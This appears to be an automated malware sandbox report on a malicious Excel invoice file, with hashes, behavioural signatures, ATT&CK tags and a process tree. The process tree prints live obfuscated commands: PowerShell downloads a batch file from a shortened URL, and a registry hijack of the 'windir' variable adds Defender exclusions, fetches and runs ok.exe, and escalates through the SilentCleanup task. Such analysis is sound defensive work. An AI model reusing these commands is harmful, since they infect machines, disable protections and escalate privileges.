279bf00b0c81ab8baeb09989215ad376377c40a3abd4358d041ec06746c986fe

General

Target

invoice68684881.xls
Size

228KB
MD5

1a7cd8bd3fcf0b4a7f351a148dc7e40a
SHA1

e336117d94537924cf4ecef038231b29bafdf261
SHA256

279bf00b0c81ab8baeb09989215ad376377c40a3abd4358d041ec06746c986fe
SHA512

7fe9785c22a2be59dba2e7e8974a4c7196522c17e6a3ed6591af2354ee2a601defc6ff023575043063d9dcde1e37211c49aad3cfab71840d312b191ab89d7c63

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cutt.ly/fjYtydH

Signatures

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exepowershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2364	3928	cmd.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	644	3928	powershell.exe	EXCEL.EXE

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

22 3056 powershell.exe
24 3056 powershell.exe

flow	pid	process
22	3056	powershell.exe
24	3056	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

3156 timeout.exe

pid	process
3156	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

3928 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exe

pid process

3056 powershell.exe
3056 powershell.exe
3056 powershell.exe
644 powershell.exe
644 powershell.exe
644 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 3056 powershell.exe
Token: SeDebugPrivilege 644 powershell.exe

pid	process
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
644	powershell.exe
644	powershell.exe
644	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3056	powershell.exe
Token: SeDebugPrivilege	644	powershell.exe

Suspicious use of SetWindowsHookEx 16 IoCs

Processes:

EXCEL.EXE

pid	process
3928	EXCEL.EXE
3928	EXCEL.EXE
3928	EXCEL.EXE
3928	EXCEL.EXE
3928	EXCEL.EXE
3928	EXCEL.EXE
3928	EXCEL.EXE
3928	EXCEL.EXE
3928	EXCEL.EXE
3928	EXCEL.EXE
3928	EXCEL.EXE
3928	EXCEL.EXE
3928	EXCEL.EXE
3928	EXCEL.EXE
3928	EXCEL.EXE
3928	EXCEL.EXE

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

EXCEL.EXEcmd.exepowershell.execmd.exe

description	pid	process	target process
PID 3928 wrote to memory of 2364	3928	EXCEL.EXE	cmd.exe
PID 3928 wrote to memory of 2364	3928	EXCEL.EXE	cmd.exe
PID 2364 wrote to memory of 3056	2364	cmd.exe	powershell.exe
PID 2364 wrote to memory of 3056	2364	cmd.exe	powershell.exe
PID 3928 wrote to memory of 644	3928	EXCEL.EXE	powershell.exe
PID 3928 wrote to memory of 644	3928	EXCEL.EXE	powershell.exe
PID 644 wrote to memory of 1308	644	powershell.exe	cmd.exe
PID 644 wrote to memory of 1308	644	powershell.exe	cmd.exe
PID 1308 wrote to memory of 1268	1308	cmd.exe	cmd.exe
PID 1308 wrote to memory of 1268	1308	cmd.exe	cmd.exe
PID 1308 wrote to memory of 1132	1308	cmd.exe	reg.exe
PID 1308 wrote to memory of 1132	1308	cmd.exe	reg.exe
PID 1308 wrote to memory of 3156	1308	cmd.exe	timeout.exe
PID 1308 wrote to memory of 3156	1308	cmd.exe	timeout.exe
PID 1308 wrote to memory of 3740	1308	cmd.exe	schtasks.exe
PID 1308 wrote to memory of 3740	1308	cmd.exe	schtasks.exe
PID 1308 wrote to memory of 3620	1308	cmd.exe	reg.exe
PID 1308 wrote to memory of 3620	1308	cmd.exe	reg.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\invoice68684881.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3928

C:\Windows\SYSTEM32\cmd.exe
cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebCL`I`eNT).('Down'+'loadFile').Invoke('https://cutt.ly/fjYtydH','a.bat')
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2364

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 (nEw-oB`jecT Net.WebCL`I`eNT).('Down'+'loadFile').Invoke('https://cutt.ly/fjYtydH','a.bat')
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3056

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 ./a.bat
2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:644

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Documents\a.bat""
3⤵
- Suspicious use of WriteProcessMemory
PID:1308

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ver
4⤵
PID:1268

C:\Windows\system32\reg.exe
reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 Add-MpPreference -ExclusionPath "C:\tmp" ;Add-MpPreference -ExclusionPath "${EN`V`:APPdAta}" ;sTAR`T-sl`EeP 12;(nEw-oBje`cT Net.WebcL`IENt).('Down'+'load'+'Fi'+'le').InVoke('http://tinyurl.com/whh7gqu7',(${EN`V`:Appdata})+'\ok.exe');sTAR`T-sl`EeP 2; sTAR`T-pr`OCeSs ${EN`V`:Appdata}\ok.exe;
4⤵
PID:1132

C:\Windows\system32\timeout.exe
timeout /t 2
4⤵
- Delays execution with timeout.exe
PID:3156

C:\Windows\system32\schtasks.exe
schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
4⤵
PID:3740

C:\Windows\system32\reg.exe
reg delete "HKCU\Environment" /v "windir" /F
4⤵
PID:3620

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
d737fc27bbf2f3bd19d1706af83dbe3f

SHA1
212d219394124968b50769c371121a577d973985

SHA256
b96b55a2acd9c790092e8132b31e5f0110492f98828098112d46f2f9faa2b982

SHA512
974c2db081dd6d1f45763371c41e01173b189ea1a2d893d0bc415670bfa12f3934ba9dea64018b8c063017454d4d92888d6fe6eaad1659e420ba9adcde5e788b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
0c103bf1b39e66df6c3175f9c8359199

SHA1
7b0fea693aef2a8917f80ab5653884ec3039ea9c

SHA256
4c63f0c2f4a19578c802b1c7f4e133780fd9a80669f34a9828b70378624273e3

SHA512
cac817e29241c4af6521f8d1ddf86bbde79117f531d2034c5d9e30555ec89dd87a73d9b89b2eab56723b5f7198ba2fa69dcdfe91e7a6cb1e01bea211afcb53cc

Download Submit
C:\Users\Admin\Documents\a.bat
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\Documents\a.bat
MD5
eab9ac4cfc0e6aa9939be0c293c7556b

SHA1
fa30846405b069fc89083f24d50fac63207afbd3

SHA256
4b14e687dbba652208cbf0942bfae90d39cfa6ee2c8dc266fe4ac51f37cbade1

SHA512
25d128d41c95f6a20896f2e71260b3df24dec8c44f3c4d6850a662879cc78c82d23c3c4f508c2443472ec68c01bd0ca7cd912ee01884eabf66cb45a893097654

Download Submit
memory/644-31-0x0000015DECC66000-0x0000015DECC68000-memory.dmp

Filesize
8KB

Download
memory/644-28-0x0000015DECC63000-0x0000015DECC65000-memory.dmp

Filesize
8KB

Download
memory/644-27-0x0000015DECC60000-0x0000015DECC62000-memory.dmp

Filesize
8KB

Download
memory/644-18-0x00007FF8E0620000-0x00007FF8E100C000-memory.dmp

Filesize
9.9MB

Download
memory/644-16-0x0000000000000000-mapping.dmp

Download
memory/1132-25-0x0000000000000000-mapping.dmp

Download
memory/1268-24-0x0000000000000000-mapping.dmp

Download
memory/1308-22-0x0000000000000000-mapping.dmp

Download
memory/2364-7-0x0000000000000000-mapping.dmp

Download
memory/3056-10-0x000001EA498F0000-0x000001EA498F1000-memory.dmp

Filesize
4KB

Download
memory/3056-13-0x000001EA315D3000-0x000001EA315D5000-memory.dmp

Filesize
8KB

Download
memory/3056-9-0x00007FF8E0620000-0x00007FF8E100C000-memory.dmp

Filesize
9.9MB

Download
memory/3056-8-0x0000000000000000-mapping.dmp

Download
memory/3056-11-0x000001EA49AA0000-0x000001EA49AA1000-memory.dmp

Filesize
4KB

Download
memory/3056-14-0x000001EA315D6000-0x000001EA315D8000-memory.dmp

Filesize
8KB

Download
memory/3056-12-0x000001EA315D0000-0x000001EA315D2000-memory.dmp

Filesize
8KB

Download
memory/3156-26-0x0000000000000000-mapping.dmp

Download
memory/3620-30-0x0000000000000000-mapping.dmp

Download
memory/3740-29-0x0000000000000000-mapping.dmp

Download
memory/3928-6-0x00007FF8E8ED0000-0x00007FF8E9507000-memory.dmp

Filesize
6.2MB

Download
memory/3928-2-0x00007FF8C5770000-0x00007FF8C5780000-memory.dmp

Filesize
64KB

Download
memory/3928-5-0x00007FF8C5770000-0x00007FF8C5780000-memory.dmp

Filesize
64KB

Download
memory/3928-4-0x00007FF8C5770000-0x00007FF8C5780000-memory.dmp

Filesize
64KB

Download
memory/3928-3-0x00007FF8C5770000-0x00007FF8C5780000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads